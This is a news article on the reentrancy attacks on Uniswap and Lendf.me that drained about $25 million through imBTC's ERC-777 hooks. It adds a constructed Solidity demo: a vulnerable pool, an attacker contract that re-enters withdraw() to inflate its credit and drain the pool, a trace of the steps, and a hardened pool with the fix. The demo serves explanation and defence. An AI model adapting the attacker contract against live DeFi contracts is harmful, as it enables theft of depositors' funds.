Hackers have stolen more than $25 million in cryptocurrency from the Uniswap exchange and the Lendf.me lending platform.
The attacks occurred over the weekend, on Saturday and Sunday, respectively. Although an investigation is currently underway, the two attacks are believed to be related, and most likely carried out by the same group or individual.
According to investigators, the hackers appear to have chained together bugs and legitimate features from different blockchain technologies to orchestrate a sophisticated "reentrancy attack."
In a reentrancy attack, a contract makes an external call in the middle of a transaction and the attacker uses that moment to call back into the contract before it has recorded the result of the first call, which lets the same funds be withdrawn repeatedly, in a loop, against a balance that was never updated.
The Uniswap and Lendf.me incidents share the following components:
- Lendf.me protocol — a decentralized finance (DeFi) protocol developed by the dForce Foundation to support lending operations on the Ethereum platform.
- imBTC — a token that runs on the Ethereum platform and is pegged 1:1 to the Bitcoin cryptocurrency.
- ERC-777 — an Ethereum token standard (imBTC is an ERC-777 token) whose transfer hooks hand control to the sending and receiving contracts while a transfer is in progress; both Lendf.me and imBTC run as smart contracts on the Ethereum platform.
"The ERC-777 token standard has – to our knowledge – no security vulnerabilities," said Tokenlon, the company behind imBTC.
"However, the combination of using ERC777 tokens and Uniswap/Lendf.Me contracts enables [...] reentrancy attacks," the company wrote in a post-mortem report of the Uniswap and Lendf.me attacks.
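As an added illustration, not code from the original article, from Tokenlon's post-mortem, or from either affected project, the Solidity below models the combination the post-mortem describes: a lending pool that records a deposit only after pulling an ERC-777 token, and a depositor contract whose `tokensToSend` hook calls `withdraw()` while `supply()` is still executing. Every contract here (`HookToken`, `VulnerablePool`, `SafePool`, `Attacker`, `Demo`) is constructed for this example; the stand-in token replaces the ERC-1820 registry with a plain mapping and models only the sender-side hook, which is the one the attack needs. A hardened pool that applies checks-effects-interactions and a reentrancy mutex is shown next to the vulnerable one.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// EIP-777 sender hook: the token calls this on `from` (if registered) BEFORE it moves balances.
interface IERC777Sender {
    function tokensToSend(address operator, address from, address to, uint256 amount, bytes calldata userData, bytes calldata operatorData) external;
}

// Constructed stand-in for an ERC-777 token (an assumption, not imBTC): a mapping replaces ERC-1820 and only the sender hook is modelled.
contract HookToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => bool) public hasSenderHook;
    mapping(address => mapping(address => bool)) public isOperatorFor; // operator => holder
    constructor(address holder, uint256 amount) { balanceOf[holder] = amount; }
    function registerSenderHook() external { hasSenderHook[msg.sender] = true; }
    function authorizeOperator(address op) external { isOperatorFor[op][msg.sender] = true; }
    function send(address to, uint256 amount) external { _move(msg.sender, to, amount); }
    function operatorSend(address from, address to, uint256 amount) external {
        require(isOperatorFor[msg.sender][from], "not operator");
        _move(from, to, amount);
    }
    function _move(address from, address to, uint256 amount) internal {
        // Hook first, balances second: control passes to `from` while the caller is mid-transaction.
        if (hasSenderHook[from]) IERC777Sender(from).tokensToSend(msg.sender, from, to, amount, "", "");
        require(balanceOf[from] >= amount, "insufficient");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
    }
}

// Vulnerable pool: reads the caller's credit, pulls tokens (external call), then writes the credit
// from the stale read, so whatever withdraw() did during the pull is silently overwritten.
contract VulnerablePool {
    HookToken public immutable token;
    mapping(address => uint256) public supplied;
    constructor(HookToken t) { token = t; }
    function supply(uint256 amount) external {
        uint256 before = supplied[msg.sender];                 // (1) read
        token.operatorSend(msg.sender, address(this), amount); // (2) interaction: the hook fires in here
        supplied[msg.sender] = before + amount;                // (3) write from the stale value
    }
    function withdraw(uint256 amount) external {
        require(supplied[msg.sender] >= amount, "over-withdraw");
        supplied[msg.sender] -= amount;
        token.send(msg.sender, amount);
    }
}

// Hardened pool: effects before interactions, plus a mutex so no hook can re-enter either function.
contract SafePool {
    HookToken public immutable token;
    mapping(address => uint256) public supplied;
    bool private locked;
    modifier nonReentrant() { require(!locked, "reentrant"); locked = true; _; locked = false; }
    constructor(HookToken t) { token = t; }
    function supply(uint256 amount) external nonReentrant {
        supplied[msg.sender] += amount;                        // effect first
        token.operatorSend(msg.sender, address(this), amount); // interaction last
    }
    function withdraw(uint256 amount) external nonReentrant {
        require(supplied[msg.sender] >= amount, "over-withdraw");
        supplied[msg.sender] -= amount;
        token.send(msg.sender, amount);
    }
}

// Attacker: its tokensToSend hook calls withdraw() while the pool's supply() is still executing.
contract Attacker is IERC777Sender {
    VulnerablePool immutable pool;
    HookToken immutable token;
    bool private armed;
    constructor(VulnerablePool p, HookToken t) {
        pool = p; token = t;
        t.registerSenderHook();          // opt in to the sender hook
        t.authorizeOperator(address(p)); // let the pool pull our tokens
    }
    function attack(uint256 amount) external {
        pool.supply(amount); // honest deposit: credit == amount
        armed = true;
        pool.supply(amount); // hook withdraws `amount` mid-call; step (3) then records 2 * amount
        armed = false;
    }
    function tokensToSend(address, address, address to, uint256 amount, bytes calldata, bytes calldata) external override {
        if (armed && msg.sender == address(token) && to == address(pool)) {
            armed = false;         // re-enter once per deposit
            pool.withdraw(amount); // credit drops to 0 and the tokens come straight back to us
        }
    }
}

// Demo wiring: returns (credit the pool records for the attacker, tokens the pool actually holds).
contract Demo {
    function run() external returns (uint256 credited, uint256 held) {
        HookToken token = new HookToken(address(this), 1000); VulnerablePool pool = new VulnerablePool(token);
        Attacker a = new Attacker(pool, token);
        token.send(address(a), 1000); a.attack(100);
        return (pool.supplied(address(a)), token.balanceOf(address(pool)));
    }
}
```

Tracing `Demo.run()` by hand: the first `supply(100)` is honest and records a credit of 100. In the second `supply(100)`, the pool reads `before = 100`, then asks the token to pull 100; the token fires `tokensToSend` on the attacker before moving anything, the attacker calls `withdraw(100)`, the credit drops to 0 and the pool sends its 100 tokens back. Control returns to the token, which now completes the pull, and then to `supply()`, which writes `100 + 100 = 200`. The attacker ends up with the same token balance it had before the second call, while the pool records a credit of 200 against 100 tokens held; each further round inflates the credit again, and a final `withdraw()` drains other depositors' funds. Against `SafePool` the same hook fails: the credit is written before the pull, and the re-entrant `withdraw()` hits the `nonReentrant` check and reverts.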
The company believes the hackers used an exploit published in July 2019 on GitHub by OpenZeppelin, a company that performs security audits for cryptocurrency platforms.
At the time of writing, Uniswap is believed to have lost between $300,000 and $1.1 million in funds, while Lendf.me lost more than $24.5 million.
The hackers used the reentrancy attack to siphon funds from each platform into their wallets, and then immediately transferred the funds to other accounts.
Both websites have been taken down to prevent further attacks. Tokenlon has also suspended its imBTC token and is blocking all new transactions to prevent the hackers from carrying out new attacks against other platforms.